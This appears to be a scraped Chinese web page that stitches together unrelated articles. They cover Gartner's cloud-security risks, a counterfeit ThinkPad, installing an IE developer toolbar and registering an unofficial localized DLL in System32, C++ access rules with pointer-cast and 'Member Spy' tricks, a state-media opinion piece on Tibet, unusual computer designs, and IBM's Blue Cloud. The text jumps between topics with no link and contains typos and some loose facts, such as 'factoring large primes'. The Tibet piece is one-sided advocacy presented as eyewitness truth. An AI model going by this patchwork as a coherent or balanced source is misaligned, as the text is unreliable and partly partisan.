所谓云计算，就是指密集型网格(grid)服务，或称之为“基于服务架构(SOA)”的公共计算。云计算把软件和IT基础设施当作一种服务对外提供。通俗地讲，就是互联网公司向那些没有或不愿组建自身IT基础设施的中小型企业提供在线数据存储服务，第三方软件开发商也可利用云计算平台运行自己开发的应用软件。

此前在线CRM(客户关系管理)软件服务商Salesforce.com和亚马逊已经推出了云计算服务，微软和Google也在陆续跟进。如Google前不久推出了App Engine服务，微软也计划今年晚些时候推出相应产品。除Gartner外，不少业界人士也表示，企业用户使用云计算服务，等于是把自己数据交给了另一家以盈利为目标的企业代为保管，其风险性不可忽视。这些人士还认为，云计算服务应当由政府部门提供，以保证云计算服务商的中立性。

以下就是Gartner所提出的云计算服务7大潜在安全风险简介：

1、优先访问权风险

一般来说，企业数据都有其机密性。但这些企业把数据交给云计算服务商后，具有数据优先访问权的并不是相应企业，而是云计算服务商。如此一来，就不能排除企业数据被泄露出去的可能性。Gartner为此向企业用户提出建议，在选择使用云计算服务之前，应要求服务商提供其IT管理员及其他员工的相关信息，从而把数据泄露的风险降至最低。

2、管理权限风险

虽然企业用户把数据交给云计算服务商托管，但数据安全及整合等事宜，最终仍将由企业自身负责。传统服务提供商一般会由外部机构来进行审计或进行安全认证。但如果云计算服务商拒绝这样做，则意味着企业客户无法对被托管数据加以有效利用。

3、数据处所风险

当企业客户使用云计算服务时，他们并不清楚自己数据被放置在哪台服务器上，甚至根本不了解这台服务器放置在哪个国家。出于数据安全考虑，企业用户在选择使用云计算服务之前，应事先向云计算服务商了解，这些服务商是否从属于服务器放置地所在国的司法管辖；在这些国家展开调查时，云计算服务商是否有权拒绝提交所所托管数据。

4、数据隔离风险

在云计算服务平台中，大量企业用户的数据处于共享环境下，即使采用数据加密方式，也不能保证做到万无一失。Gartner认为，解决该问题的最佳方案是：将自己数据与其他企业用户的数据隔离开来。Gartner报告称：“数据加密在很多情况下并不有效，而且数据加密后，又将降低数据使用的效率。”

5、数据恢复风险

即使企业用户了解自己数据被放置到哪台服务器上，也得要求服务商作出承诺，必须对所托管数据进行备份，以防止出现重大事故时，企业用户的数据无法得到恢复。Gartner建议，企业用户不但需了解服务商是否具有数据恢复的能力，而且还必须知道服务商能在多长时间内完成数据恢复。

6、调查支持风险

通常情况下，如果企业用户试图展开违法活动调查，云计算服务商肯定不会配合，这当然合情合理。但如果企业用户只是想通过合法方式收集一些数据，云计算服务商也未必愿意提供，原因是云计算平台涉及到多家用户的数据，在一些数据查询过程中，可能会牵涉到云计算服务商的数据中心。如此一来，如果企业用户本身也是服务企业，当自己需要向其他用户提供数据收集服务时，则无法求助于云计算服务商。

7、长期发展风险

如果企业用户选定了某家云计算服务商，最理想的状态是：这家服务商能够一直平稳发展，而不会出现破产或被大型公司收购现象。其理由很简单：如果云计算服务商破产或被他人收购，企业客户既有服务将被中断或变得不稳定。Gartner建议，在选择云计算服务商之前，应把长期发展风险因素考虑在内。

不过，最近在各大论坛流行的山寨ThinkPad，不仅仅有模仿，还有先进的自主创造、研发。能将Hiphone羞得体无完肤。我们在叹服中国山寨厂商鬼斧神工的同时，也得警惕如此悲剧发生在我们自己的头上。

在电脑的左侧，散热孔旁边，又一个特殊的小白点。这就是山寨版ThinkPad的开关，开机时需要按住白点向指示方向推。

从接口上我们能够看到，里面包含了COM、LPT等稀有接口，网线接口也使老旧的调制解调接口。并且每个接口都有同样的特点：做工粗糙。

我们在山寨ThinkPad的背面，能够清晰看到Lenovo的LOGO，同时具备完整的注册信息，俨然是原厂正品。不过在背面右上角的酷似散热孔的部分，相信很多网友打死也想象不到这原来是电脑的音箱。拆下的电池也是又轻又薄。拆下电池后，主机背面露出主板的BIOS电池，不知是否为了校正超频而设计。

在适配器方面，山寨版ThinkPad更是将艰苦朴素的优良作风发挥到了极致，适配器接口采用亮相供电。

在山寨ThinkPad的C面上，我们能构看到该款产品采用了历史悠久的触摸板设计，同时ThinkVantage按键也被提换成了一个小圆点。不过在C面掌托位置赫然贴着酷睿2、Vista Basic、ATI显卡的标识，同时铁有T61P铭牌。仿真度极高，甚至超越了现行版ThinkPad的经典。

采用了标准的日系键盘排列，空格键都被分割为好几个功能按键。很容易让人误认是水货，不过据拥护表示，该款键盘的手感“比挤毛豆的感觉更爽”。

也许很多网友们看完如此经典的一款作品后，只会附之一笑；也许会同情上当了的消费者，为他的遭遇鸣不平；进一步也只是赞叹山寨场上的天马行空和鬼斧神工，担心自己在购买时也会碰上如此产品。其实攒ThinkPad的现象早有发生，只是以前都是使用成品的“小黑”，进行内部配件的升级和更换。笔者认为，这款山寨ThinkPad的经典之处在于它将成为一个信号，手机方面爆发的“山寨机”灾难，很可能被复制到笔记本身上。到时候，也许不只有山寨版ThinkPad，山寨版的XPS、天逸F41等热卖系列都会有山寨机出现在市场，到时候只能是一片大乱了。

微软的IEDevToolBar，这是一个免费的专门为Web开发人员制作的IE插件，IE插件IEDevToolBar可以帮助我们分析网站的布局结构，有助于我们学习和分析页面的CSS，其主要功能有：

    1.以树结构查看CodeDom，并查看每个Element属性，可以使用鼠标点击选中Element，这个在我们制作和调试网页时很有用；
    2.生成图片报表，就是将页面上说有出现的图片生成一份详细的报表，这样就省的我们自己去找图片路径和量图片大小等等；
    3.高亮显示表格，表格单元，Div等的边框，这个在我们调整布局时也是很有用；
    4.页面尺子，可以然你任意在页面上度量长度，这个是大大的提高了我们的工作效率，不用为了量个长度而抓图再用画图工具量。

    现在我就介绍给大家一起分享吧，装上后在Web项目调整界面时它真的是用处很多啊！

    附： 下载地址（英文版）：本地下载  官方下载 

安装之后，在IE顶部菜单的“查看” － “工具栏” 里面钩选“Developer Toolbar”项即可。这下在IE下做 Web开发就方便多了！

    汉化方法：下载下面汉化.dll文件后解压，如果已安装英文版，则关闭所有的IE程序后覆盖IEDevToolbar.dll文件（默认安装路径为：\Program Files\Internet Explorer Developer Toolbar）。如果没有安装英文版，则可以将IEDevToolbar.dll文件解压到\Windows\System32目录下，然后运行：regsvr32 IEDevToolbar.dll即可。

    汉化IEDevToolbar.dll文件下载地址：点击下载

初看起来，倒是会产生疑问。为什么会这样，是否有bug？
仔细考究起来，我们其实可以这样看待类和对象：
类是将数据成员和进行于其上的一系列操作(成员函数)封装在一起,注意：成员函数可以操作数据成员（可以称类中的数据成员为泛数据成员）！
对象是类的实例化，怎样理解实例化？其实每一个实例对象都只是对其中的数据成员初始化，内存映像中每个对象仅仅保留属于自己的那份数据成员副本。而成员函数对于整个类而言却是共享的，即一个类只保留一份成员函数。
那 么每个对象怎样和这些可以认为是“分离”的成员函数发生联系，即成员函数如何操作对象的数据成员？记住this指针，无论对象通过(.)操作或者(- >)操作调用成员函数，编译时刻，编译器都会将这种调用转换成我们常见的全局函数的形式，并且多出一个参数(一般这个参数放在第一个)，然后将 this指针传入这个参数。于是就完成了对象与成员函数的绑定(或联系).
实例化后就得到同一个类的多个不同的对象，既然成员函数共享的，那么成员函数就可以操作对象的数据成员。
问题是现在有多个对象，成员函数需要知道操作的是哪个对象的数据成员？
比如有对象obj1和obj2，都属于A类，A类有public成员函数foo()
如果obj1调用该函数，编译时会给foo函数传入this指针，obj1,foo中操作obj1自身的成员就不用任何修饰，直接访问，因为其中的数据成员自动根据this指针找到。
如果obj1调用该函数，同样可以访问同类的其他对象的数据成员！那么你需要做的是让foo函数知道是同类对象中哪个对象的数据成员，一个解决办法是传入同类其他对象的指针或引用，那么就可以操作同类其他对象的数据成员。
foo(A &obj)
这样定义，然后调用：
obj1.foo(obj2)
就可以在obj1访问obj2的数据成员，而无论这些数据成员是private还是protected

搬出C++ Object Model,可以画出各个对象的内存map就可以更清晰的看出:


总结：C++的访问修饰符的作用是以类为单位，而不是以对象为单位。

通俗的讲，同类的对象间可以“互相访问”对方的数据成员，只不过访问途径不是直接访问.
步 骤是：通过一个对象调用其public成员函数，此成员函数可以访问到自己的或者同类其他对象的public/private/protected数据成 员和成员函数(类的所有对象共用)，而且还需要指明是哪个对象的数据成员(调用函数的对象自己的成员不用指明，因为有this指针；其他对象的数据成员可 以通过引用或指针间接指明)

C++中public,protected,private访问小结
第一:private,public,protected方法的访问范围.（public继承下）
private: 只能由该类中的函数、其友元函数访问,不能被任何其他访问，该类的对象也不能访问.
protected: 可以被该类中的函数、子类的函数、以及其友元函数访问,但不能被该类的对象访问
public: 可以被该类中的函数、子类的函数、其友元函数访问,也可以由该类的对象访问
注：友元函数包括两种：设为友元的全局函数，设为友元类中的成员函数

第二:类的继承后方法属性变化:
使用private继承,父类的所有方法在子类中变为private;
使用protected继承,父类的protected和public方法在子类中变为protected,private方法不变;
使用public继承,父类中的方法属性不发生改变; 
                                                                                                                                                                                                                                                                                                   

	public:	protected:	private:
public继承	public	protected	---
protected继承	protected	protected	---
private继承	private	private	---

protected继承和private继承能降低访问权限

再次提到：可以提供访问行为的主语为“函数”。
类体内的访问没有访问限制一说，即private函数可以访问public/protected/private成员函数或数据成员，同理，protected函数，public函数也可以任意访问该类体中定义的成员
public继承下，基类中的public和protected成员继承为该子类的public和protected成员（成员函数或数据成员），然后访问仍然按类内的无限制访问


                                        

对于类域范围内，成员函数访问无所谓访问限制。 对于继承情况下的基类private成员，在派生类中仍然继承了下来，只不过它不能直接访问,   即使在类里也不行,   更不用说是类对象了。 可以通过下列例子看到：               1 #include <iostream>  2 using namespace std;  3   4 class C{  5 public:  6     C(int val) : m_c(val) {}  7 private:  8     int m_c;  9 }; 10  11 class D: public C{ 12 public: 13     D(int val1, int val2) : C(val1), m_d(val2) {} 14     int m_d; 15 }; 16  17 int main() 18 { 19  20  21     cout << sizeof(C) << " " << sizeof(D) << endl; // 4  8 22     D obj(2, 25); 23     cout << &obj << " " << &obj.m_d << endl; //0x0012FF78   0X0012FF7C 24     //cout << obj.m_c;  //error, 不能访问 25  26     D *ptr = &obj; 27     int *iptr = (int *)ptr; 28     cout << *iptr << " " << *(iptr+1) << endl;//2  25 29      30     return 0; 31 } 32  33               同样，加入虚函数，可以看到VC编译器将vptr放置在数据区的最开头

下面摘自博客园的一篇，相当精辟的理解：

下面这个问题摘自论坛的一个帖子：

已知3个类O、P和Q，类O中定义了一个私有方法F1、一个公有方法F2和一个受保护的方法F3：类P和类Q是类O的派生类，其继承方式如下所示：
class P : protected O {…};
class Q : public O {…};
关于方法F1的描述中正确的是___(34)___；关于方法F2韵描述中正确的是___(35)___；关于方法F3的描述中正确的是___(36)___。
(34)
A．方法F1无法被访问
B．只有在类O内才能访问方法F1
C．只有在类P内才能访问方法F1
D．只有在类Q内才能访问方法F1
(35)
A．类O、P和Q的对象都可以访问方法F2
B．类P和Q的对象都可以访问方法F2
C．类0和Q的对象都可以访问方法F2
 D．只有在类P内才能访问方法F2
(36)A．类0、P和Q的对象都可以访问方法F3
B．类0、P和Q的对象都不可以访问方法F3
C．类0和Q的对象都可以访问方法F3
D．类P和Q的对象都可以访问方法F3。

有甚么办法可以简单地记住这许多的规则？ 下文告诉你一个根本不需要记的办法。

顾名思义，private/public/protected 分别表示 私有/公开/保护，它们是一组用于访问权限控制的关键字。那么首先，需要澄清的一个关键点是，是要控制谁访问谁的权限？这个访问的主语（施事）是谁？宾语（受事）是谁？

我们经常听到这样的说法：

1）一个类友元可以访问该类的任何成员（包括成员变量及成员方法，下同）。
2）private成员只有该类自身可以访问，protected成员只有该类及其派生类可以访问，public成员所有的人都可以访问。

宾语（受事）是谁这一点很明确，是类的成员（包括成员变量及成员方法）。主语（施事）是谁？这是让大家发生混淆的关键点。也是这个说法中含糊不清的地方。

想清楚一点，其实主语（施事）指的是一个函数，而不是类（当然更不是变量）。private/public/protected要控制的是一个函数（施事）对一个类的成员（包括成员变量及成员方法）的访问权限。因此比较完整的说法是：

1）一个类友元（包含友元函数或者友元类的所有成员函数）可以访问该类的任何成员（包括成员变量及成员方法）。

2）除去友元外，private成员只有该类自身的成员函数可以访问，protected成员只有该类的成员函数及其派生类的成员函数可以访问，public成员则所有的函数都可以访问。

也就是说，当我们说一个类可以访问XXX，其实暗指这个类的成员函数可以访问XXX。了解了这一点，外加一条显而易见的规则，上面的问题就不难回答了。这条规则是：

3）派生类在继承时可削弱成员的访问权限（通过protected/private修饰）。例如上面的例子class P : protected O {…}; 那么某个函数通过类P访问O中成员时，该函数对类O中的public成员只有protected权限。

补充：有一种技术叫Member Spy（类成员间谍），通过该技术派生类可将基类的protected成员修改为public权限。这种技术用到了using关键字。举例如下：

class A
{
protected:
　int m_data;
};

class SpyA : public A
{
public:
　using A::m_data;
};

void TestSpy(A* pA)
{
　SpyA* pSpyA = static_cast<SpyA*>(pA);
　// 强制转换A为SpyA，这要求SpyA没有成员变量且没有重载A中的虚函数。
　// 现在你可以通过pSpyA访问m_data了。例如：int data = pSpyA->m_data;
}

由于这种技术用到了强制类型转换，当谨慎使用。

　 　中国日报网环球在线消息：英文《中国日报》4月22日报道：对西藏感兴趣是一件好事，但是很多人在不了解西藏的真实情况时往往对西藏问题心存偏见，其中 也包括达赖喇嘛和那些流亡海外的“藏独”分子们。加拿大作家李莎·卡尔杜齐为《中国日报》撰文，揭露外界对西藏的印象是如何被扭曲的。全文如下：

　　如果大家都像我的朋友们一样对西藏充满兴趣，那当然是件好事。不幸的是，大多数人对西藏问题完全持有偏见。

　　只有一少部分的人足够诚实，他们在亲自到访西藏并了解事实后才发表对西藏的看法，而其他人只选择听他们想听的和那些不破坏他们对西藏固有印象的言论。

　　举个真实的例子：我的一位加拿大朋友是位大学教授，他于1997年5月去了西藏。在回来之后他告诉我说：他们一群人在警察的强迫下离开一家西藏 餐馆，随后又被带到一家由汉人开设的饭店。他认为这背后的原因是种族主义，是想“破坏藏族人民”的邪恶企图。在完全不懂当地语言和不知发生什么事情的情况 下，他草率的判断带有明显的偏见色彩。

　　我当时不在现场，也没有看到发生了什么。但当我和熟悉当地情况的汉民、藏民讨论此事后，我们一致得出了结论，认为当时的情况应该源于以下几种可 能：这家藏式餐厅没有营业许可证；老板没有交税；这里的卫生标准达不到接待外宾的要求；餐厅老板和警察有私人矛盾或者餐厅老板走私古代唐卡(藏式涂绘中的 一种)。

　　我们时常假设所有的藏民都是一样的，认为他们的想法、行为是一致的。其实我们大错特错了。我所遇到的那些生活在西藏和甘肃省夏河县的藏民们看上去对政治并不热衷，他们快乐、平静地生活着。在生活一年比一年好的情况下，他们对中央政府毫无怨言。

　　然而，在尼泊尔朴卡拉近郊的市场里，我和当地的藏民妇女聊了两个小时，她们的说法却完全不同。最大的不同在于尼泊尔的藏民认为“汉民侵略了西 藏，他们被迫逃亡。”其中有一个女人的中文不错，是这个村子的翻译。她告诉我说：“西藏解放后，我要马上回去，去找好的工作。你觉得这能叫生活吗？我们在 这儿干嘛呢？只能做些小本生意。”

　　我很同情她，因为她已经完全被反中国的宣传同化了。我告诉她说，在她之前我遇到的藏民们都非常清楚中国政府为他们做了些什么，而且对此心怀感 激。“很抱歉地告诉你，”我说，“如果你认为你那些仍生活在中国的西藏同胞和你的想法一致，也支持西藏独立的话，你就是在愚弄自己。”

　　她睁大眼睛看着我，问道：“你去过西藏吗？”

　　“当然！如果我没去过，我怎会知道这些事情？”我斩钉截铁地说。她顿了一会，说道：“每年3月10日，世界各地的藏民都会为争取独立示威游行， 如果你在那天去西藏的话，你将会看到中国军队在大街上滥杀无辜。”我所想的是，如果她说的是真的，我绝不可能留在西藏，早就被送到其他的星球去了。

　　“我见过他们杀人的照片和录像，每年都能看到。”她说。

　　“谁照的这些照片？”

　　“外国人呀，来自世界各地的外国人。”

　　我让自己的心情平静了一会儿，然后问道：“你确定这些照片和录影都是近期拍摄的吗？它们可能录制在文化大革命时期。那时不光西藏人民，全中国都 处在动荡中。照片也可能拍摄于1959年的武装造反？也许你被他们蒙骗了？也许他们每年都给你看相同的照片？也许照片被修改过了？”

　　作为当地藏民的发言人，她转过身来对我说：“你说的也有可能，但我们没有办法证实。”

　　“这也可能是支持达赖的激进分子干的”，我说，“村子入口处的黑板上挂着由‘神圣达赖喇嘛办公室’签发的印有‘中国人，滚出去’的复印信件，你认为这些会是谁写的呢？”

　　我向他们讲述了西藏发生的巨变：中央政府注巨资帮助西藏重建和再发展；教育上取得了进步；宗教自由得到了保障；卫生与社会生活也有了质的飞跃。听完我的讲述后他们都很震惊，显然之前没有人告诉过他们这些。

　　我问：“你相信我说的吗？”

　　“我相信你，因为你是个外国人，你不是共产党吧？”她说。

　　“你可以相信我，我说的都是我的亲眼所见。西藏是个美丽平静的地方，人们在工作的时候都会唱歌，他们微笑着享受生活。”

　　村子中年轻一些的村民是在尼泊尔出生的，其他人都是50年代从西藏跑到尼泊尔的，他们从来没有回去过，也没有护照，自然就不能回到中国。

　　之后我参观了一座寺庙，那里的一位17岁的僧人告诉我说，他最大的愿望就是能踏上西藏这片圣土。他认为在中国的僧人都被关押在监狱里，或者被杀害。而这种想法的根据是他的一位朋友去了中国，就再也没有回去过。

　　“年轻人，你的朋友可能被捕，但那是因为他非法入境。但是如果你再也没有听到关于他的消息，很可能是因为他已经完成了他的梦想，抵达西藏并生活在那儿的寺庙里。”

　　他低下头说道：“真希望我也能有这样的机会呀！”

　　最后，我意识到身在国外的藏民是无知和错误宣传运动的受害者。一个想法突然涌上我的心头——达赖喇嘛会不会也和他们一样？他在很年轻时就离开了 西藏，并且受了某些组织的影响。之后他再也没有亲眼见过西藏，对那里发生的事情也并不能做客观的判断。他就像村子市集上的那个女人一样，也是个可怜的受害 者。

　　(作者：李莎·卡尔杜齐(Lisa Carducci)，加拿大作家。 翻译：王薇)

1、光子计算机

通过光编码数据并不奇怪，目前全球通讯系统是基于光纤技术。但是使用光信号实际处理数据资料，并进行计算处理却并没有实际应用。  

光子计算机是一个值得努力实现的目标，其原因是使用光 可增加计算机的处理速度以及可处理的数 据质量，但是获得、存储和处理光是非常困难的。像美国伊利诺斯州立大学的保罗?布劳恩等研究人员目前正积极进行该研究。他在光子晶体外建立了3D光学波 导，这可能会获得光，使光在锐角转角减缓速度并发生弯曲，而不必担心光的逃逸。

其间，美国哈佛大学的米克海尔?卢金研制了一种光学型晶体管，能够成为现今计算机的能量源。卢金和同事们已建立了使用单一光子从光信号中分离出来的通道，该通道可以转换另一种光信号开启或关闭。  

  
量子计算机

2、量子计算机

如果你想破坏传统计算机计算处理规则，量子计算机将实现这一点。量子计算机不使用1或0的电子比特信息，而采用量子机械效应而建立量子比特。  

量子计算机是一类遵循量子力学规律进行高速数学和逻辑运算、存储及处理量子信息的物理装置。当某个装置处理和计算的是量子信息，运行的是量子算法时，它就是量子计算机。量子计算机的概念源于对可逆计算机的研究。研究可逆计算机的目的是为了解决计算机中的能耗问题。  

计算显示，量子计算机有能力执行许多平行计算。当量子计算机中量子比特数目增加时，数据将以指数级增长。这将实现现今计算机难以实现的计算处理，比如：快速因式分解较大质数裂化密钥。  

然而，量子计算机迄今仅有非常小数目的量子比特，其使用量子圆点、核磁共振、金属离子。

  
DNA计算机  

3、DNA计算机

DNA将是一种用于执行计算的完美材料，在某种意义上，DNA处理数据和运行程度存储在排序普通碱基对DNA中，处于调整状态蛋白质处理信息就如同DNA有机体维持存活一样。  

第一个将DNA用于计算处理的是南加州大学伦纳德?阿德勒曼，1994年，他使用DNA解答了著名的“7点哈密尔敦函数通道”数字问题。从此之后，DNA能够用于建立逻辑门和挑战tic-tac-toe游戏。  

由于DNA分子具有强大的并行运算和超高的存储能力，DNA计算将可能解决一些电子计算机难 以完成的复杂问题，而且也可能在体内药物传输或遗传分析等领域发挥重要作用。虽然DNA计算未来潜力无穷，但是当前仍然有许多瓶颈技术和基础问题需要解 决，其中基于DNA分子的逻辑门就是实现DNA计算的一个重要基础。

近期，DNA计算机的狂热者对建立像人体内的生物学系统非常感兴趣，这样的研究非常有意义，其原因是它的装配性非常好，与传统计算机相比，能够将计算机缩小至最小化，而且便于运行计算处理。  

  
可逆计算机  

4、可逆计算机

许多人思考我们应当循环利用比特，就如同再循环利用垃圾一样。计算机硬件公司长期以来试着减少计算机的能量消耗，一种不同寻常的方法是由“可逆”工程芯片实现的。  

正常地每个计算操作会失去一些比特信息，也可表现为丢弃能量。可逆计算机的目标是重新获得并使用这些能量。由美国佛罗里达州立大学迈克尔?弗兰克设计的可逆计算机通过逻辑门能够实现逆行运算。  

每一个计算操作包括向逻辑门中输入数据，然后逻辑门出产输出信号，从而代替丢弃能量的信号。弗兰克设计的可逆计算机在每一个计算运行之后逻辑门实现逆行运算，输出信号返回的能量开启执行新的输入信号。  

  
撞球计算机  

5、撞球计算机

数据计算处理可通过光在分子至分子间内部进行连锁反应实现，这对用于一些计算处理的连锁反应非常具有意义，甚至可用于多米诺或大理石弹球进行计算。  

这种计算机的逻辑门是由仔细安排的多米诺或斜道石弹球滚动实现的。该计算机虽然比较特殊，但 却相当于几英亩大小面积的无数强大微处理器所实现的功能，除非石弹球或多米诺骨牌非常小。IBM公司研究人员采用层叠原子像撞球彼此运行作为逻辑电路，像 这样的逻辑门仅能使用一次，但是其意义却意味深长，它比现今最小的晶体管都要小。

  
神经细胞计算机  

6、神经细胞计算机

当一些研究人员借助已经成功的理念，为什么还称这是计算机技术开发的起跑线呢？目前，研究人员希望能够借助人体的自然力量建造特殊的计算机。  

美国芝加哥西北大学费迪南?穆萨?伊瓦尔迪展示了如何利用七鳃鳗的一些脑细胞控制一个机器人。七鳃鳗是一种像鳗鱼的原始脊椎动物。这些脑细胞可控制机器人跟随着光源移动。但这并不是第一次使用动物的大脑进行神经细胞计算机实验。  

神经细胞计算机被称为第六代电子计算机，它可以模仿人的大脑判断能力和适应能力，并具有可并 行处理多种数据功能的神经网络计算。与以逻辑处理为主的第五代计算机不同，它本身可以判断对象的性质与状态，并能采取相应的行动，而且它可同时并行处理实 时变化的大量数据，并引出结论。以往的信息处理系统只能处理条理清晰，经络分明的数据。而人的大脑却具有能处理支离破碎，含糊不清信息的灵活性，神经细胞 计算机将具有类似人脑的智慧和灵活性。

目前，美国国防部高级研究计划署通过在飞蛾大脑植入的电极，建立了远程控制的半机械飞蛾。

7、磁共振计算机

每杯水都包含着一台“计算机”，如果你正确理解磁共振运行原理。英国约克大学苏珊?斯特普尼和同事使用强磁场（核磁共振）对分子间的互相影响作用进行控制和观测。这种方法可呈现3D信息，也可使用分子形成互相影响的自然动力学。  

如果该理论被证实是可能实现，可使用水分子模拟我们复杂的大气层。迄今为止，研究人员仅能实现该运行计算的理论性，当前只处于基于水的磁共振计算机。  

8、Glooper计算机

其中最怪异的就是Glooper计算机，该计算机的建造抛弃了传统计算机的硬件配置，而是通 过建立“gloopware”实现运行计算能力。英国西英格兰大学安德鲁?阿达马特兹基能够在化学粘性物质中建立传播离子干扰波，其行为就像形成逻辑门， 成为构造计算机的积木块。

这种传播离子干扰波可由一种叫做“Belousov-Zhabotinsky”的脉冲通过循 环化学反应生成。阿达马特兹基展示这种化学反应的逻辑门可使一个机器人手臂搅动混合剂，当机器人的手指搅动混合剂刺激化学反应的发生，随后产生的化学反应 将控制机器人手臂的运动。

9、霉变计算机

即使像粘土这样的原始有机体也可以用于解决传统计算机的问题，日本名古屋物理化学研究协会Toshiyuki  Nakagaki展示粘土的霉变反应可以解决抵达迷宫的最短路径。

这引起了计算机科学家的浓厚兴趣，他们认为粘土的霉变反应可以解决类似于“售货员行程”的问题，在该问题中要求售货员在空间几个售货点之间确定最短的销售行走路程。这种问题在传统计算机上很难实现。  

10、水波计算机

或许感觉最不可能实现的就是计算运算能力在水池的波纹中实现。英国苏塞克斯郡大学两位研究人员使用一个波动水箱和一个高架摄像仪，通过波形生成一个“或逻辑门”或“异逻辑门”类型。

看看亚马逊去年推出的弹性计算云服务。由于它可以让小型企业按照自己的需要购买 亚马逊数据中心的处理能力，受到了用户的大力追捧：以EC2为基础的云存储S3在不到一年的时间里，就已经存储了50亿个对象。受S3的刺激，今年，云存 储服务之战再度升级，Google、微软和苹果都在近期推出了这一服务，希望在亚马逊独大的市场中分流更多用户，以便扩大广告受众。更多的企业和个人选择 通过Web服务共享大型数据中心的资源，这已经成为不可逆转的趋势，但问题是，以Web服务为导向新建的数据中心应该是什么样的？

何以成为趋势  

支持云计算，只有这样的数据中心才能承担层出不穷的Web应用。其实，云计算就是 Google数据中心得以处理互联网服务的技术秘密，而Google的搜索引擎就是云计算初期的服务产品，现在的云存储以及未来更多形式的Web新应用将 使云计算成为Web时代的新型计算语言。

那么，神秘的云计算究竟是什么？IBM高性能随需解决方案团队副总裁Willy Chiu近日接受记者采访时表示，云计算能够使计算分布在大量的分布式计算机，而非本地计算机或远程服务器农场上，这使得企业数据中心的运行与互联网计算 模式相似。而满足云计算的数据中心足以应对互联网规模的计算挑战，往往在分秒之间就能处理超大规模的数据流量。通过与网格计算的对比，Willy Chiu形象地解释了云计算的秘密。金融机构利息计算可用来解读网格计算：由于计算利息的公式一定，因此可以按照数据库的参数分配计算任务，采用多态模拟 的方式，以重复的形式进行分布式计算，最后将各个计算任务整合起来得到最终计算结果。而搜索引擎计算用来解读云计算再合适不过：网页的变更通常大量而复 杂，但云计算可很容易地处理海量数据，它不仅可以将搜索任务切分为多个小的任务模块执行，而且单个任务模块可以采用不同的算法，这样的计算结果集合就是搜 索结果。

由此看来，云不仅仅是计算机资源的简单汇集，因为其提供了一种管理这些资源的机 制，管理包括资源提供、变更请求、重新映像、工作负载重新平衡、资源解除提供和资源监测。从某种意义上说，云计算更像是网格计算的升级，但它的最大魅力就 在于，在这种计算模式下，计算业务将不再局限于个人桌面和企业计算中心，而可以成为一种依托于互联网处理的服务。

让云计算落地  

如果说大型互联网企业是云计算最早的需求者与推动者，那么，越来越多的非互联网用户 也开始遭遇互联网企业当初的问题：不仅效率、能耗和管理成本不能满足需求，他们还开始大量采用类似互联网企业的业务，如电子商务、内部门户、虚拟世界等 等。让更多用户真正享用云计算的任务落在了关注数据中心的系统企业肩上：这些用户什么时候也可以像亚马逊、Google等互联网巨头那样，运行和管理自己 的数据中心呢？

11月15日，IBM率先出台了蓝云（Blue Cloud）计划，而它的目标就是为企业带来即可使用的云计算。蓝云基于由IBM软件、系统技术和服务支持的开放标准和开源软件，它包括一系列的云计算产 品，使计算不仅仅局限在本地机器或远程服务器农场，而是通过架构一个分布的、可全球访问的资源结构，使数据中心在类似互联网的环境下运行计算。

即可使用也意味着对于广大企业来说，云计算不再只是概念。据悉，在计划出台当 天，IBM就在上海演示了运行在配置Power和x86处理器的IBM BladeCenter上的云计算技术，当时的演示任务是随着某一应用工作负载的变化，如何动态地提供和分配资源。而第一套支持Power和x86处理器 系统的蓝云产品将于明年春季正式推出，IBM还计划于明年提供一个System z大型主机云环境，以充分利用System z支持的超大数量虚拟机的能力。同时，IBM还计划提供基于高密度机架集群的云环境。据Willy Chiu透露，大多数服务器产品上都将升级为支持蓝云的产品，而通过服务和软件部门的协作，蓝云可以渗透到IBM的软件、硬件以及服务之中。

IBM已经在自己企业内部实现了云计算应用试点，同时IBM还选定了一批涉及金 融服务、政府、电信等多个行业的用户，将于近期合作展开云计算的升级计划。据悉，目前，第一个吃螃蟹的用户是越南科技部。就在11月13日，双方已经共同 宣布了一项将运行在云计算基础架构上的开放创新试点计划。

IT天空多“云”  

可以看出，IBM已经将云计算作为重要的战略方向。IBM全球高级副总裁 Zeitler甚至将IBM蓝云计划的重要性与IBM在7年前对Linux的支持相比拟。目前，全球有超过200名的IBM研究人员参与开发蓝云计划， Zeitler近日还表示，在今后三年的阶段规划中将投入巨资来实施蓝云计划。尽管他没有透露具体资金数目，但是将几乎所有服务器、软件以及服务都能做到 支持蓝云绝对是一项浩大的工程。

当然，看重企业内部计算大规模转移到云计算的系统级企业并非只有IBM一家。例 如，戴尔在今年3月成立了新业务部—数据中心解决方案部门，而它推出的第一项服务就是云计算解决方案。Sun也在前不久推出了移动数据中心—可以装在集装 箱里的Sun Black Box，里面满满当当地放置了252台Sun服务器。除了移动的特色之外，它也将在云计算中发挥重大作用。因为Sun认为，未来PC、手持设备、iPod 等无数终端设备都将简单地接入到在线应用，这正是云计算的体现。此外，Sun还提供租赁主机的服务来帮助用户实现云计算。

由此可见，蓝云产品与Sun Black Box都是将系统的占用空间、经济性、能耗量、计算性能当作一个综合的整体来考虑，把服务器、存储设备、网络设备、操作系统、中间件等软硬件都集成在一起 的IT基础设施管理起来。同时，通过实时监控高效计算资源利用情况，向着使用户像使用水电等资源一样使用IT设施的目标又迈进了一步。不过，IBM并没有 相关的租赁服务计划推出。Willy Chiu认为，这是为了防止因租赁相关服务而造成商业机密泄露等安全问题。谈到与Sun Black Box在技术思路上的区别时，Willy Chiu认为，蓝云面向主流商业性客户普及互联网计算技术，其核心竞争力包括：更为开放，支持开源系统；高层次地实现虚拟化技术；具备自动配置能力；提供 企业级安全的互联网计算能力。也许用户不愿意全部服务器都使用同样的操作系统，而IBM的蓝云产品通过API接口可以实现较大的开放性。

随着支持云计算的产品和方案的陆续落地，非互联网型企业也将享用这一技术，明年也许可以被称为云计算的应用元年。  

蓝云架构什么样？  

云计算既描述了一种平台，又描述了一类应用。一个云计算平台能够根据需要动态地提供、配置、再配置和解除提供服务器。而云应用则是那些经过扩展能够通过互联网访问的各种应用，这些云应用运行在那些托管Web应用和Web服务的大型数据中心及功能强大的服务器上。  

IBM开发蓝云的目的，是帮助用户充分利用云计算，包括云应用的能力，通过基于 SOA的Web服务，与现有的IT基础架构集成。蓝云将特别关注IT管理简化方面的突破性需求，以保证安全性、隐私性、可靠性、高使用率和高效率。另外， 云计算主要针对现有的和即将出现的大规模数据密集型工作负载。

IBM的蓝云计算平台由数据中心、IBM Tivoli配置管理器、IBM Tivoli Monitoring、IBM Websphere应用服务器、IBM DB2和虚拟组件构成。所有的请求都由Web 2.0组件来处理。然后转发到Tivoli配置管理器，进行服务器的分配或解除分配。

IBM蓝云计算平台架构  

